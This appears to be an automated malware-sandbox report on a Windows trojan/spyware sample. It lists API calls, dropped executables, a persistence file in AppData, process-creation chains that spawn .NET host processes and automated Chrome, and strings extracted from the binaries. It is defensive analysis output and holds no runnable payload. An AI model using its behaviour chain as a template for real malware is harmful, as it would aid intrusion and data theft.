                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B606D61 ZwAllocateVirtualMemoryEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D43 ZwQueryInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589D70 ZwAlpcQueryInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B611D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D6A ZwWaitForMultipleObjects,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D0B ZwSetInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589520 ZwWaitForSingleObject,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFD22 ZwQueryInformationProcess,RtlUniform,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5445D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895D0 ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56EDC4 ZwCancelWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895C0 ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895F0 ZwQueryInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DE0 ZwAssociateWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543591 ZwSetInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601582 ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895B0 ZwSetInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DB0 ZwAlpcSetInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DA0 ZwAlpcSendWaitReceivePort,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1C49 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589C40 ZwAllocateVirtualMemoryEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589C70 ZwAlpcConnectPort,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B585C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1C76 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B580413 ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56FC39 ZwAssociateWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601411 ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A420 ZwGetNlsSectionPtr,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542CDB RtlFreeHeap,ZwClose,ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6014FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1CE4 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614CAB ZwTraceControl,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B619CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A480 ZwInitializeNlsFiles,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
                Source: F1AC.exe.10.dr | Static PE information: No import functions for PE file found
                Source: C066.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C8FE.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: DEDC.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: E64F.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C295.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: B096.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CAC5.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CBF0.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CD17.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: FD36.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: Md0q201V1D.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gbhudtb
                Source: 1105.tmp.29.dr | Binary string: \Device\IPT
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@74/167@62/20
                Source: Md0q201V1D.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
                Source: C:\Users\user\Desktop\Md0q201V1D.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Users\user\Desktop\Md0q201V1D.exe | Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Local\Temp\21.exe | Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtb | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtb | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\EBBE.exe C:\Users\user\AppData\Local\Temp\EBBE.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\C066.exe C:\Users\user\AppData\Local\Temp\C066.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\bhhudtb C:\Users\user\AppData\Roaming\bhhudtb
                Source: C:\Users\user\Desktop\Md0q201V1D.exe | Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtb | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\21.exe | Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtb | Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21.tmpJump to behavior
                Source: DF3A.exe.10.dr | Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
                Source: sqlite3.dll.35.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: sqlite3.dll.35.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: DF3A.exe.10.dr | Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
                Source: sqlite3.dll.35.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: sqlite3.dll.35.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: sqlite3.dll.35.dr | Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: sqlite3.dll.35.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: sqlite3.dll.35.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
